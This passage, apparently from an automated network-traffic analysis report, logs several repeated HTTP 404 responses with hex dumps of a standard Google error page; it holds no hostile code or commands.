                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:27 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:28 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:30 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:31 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:32 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:34 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:35 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 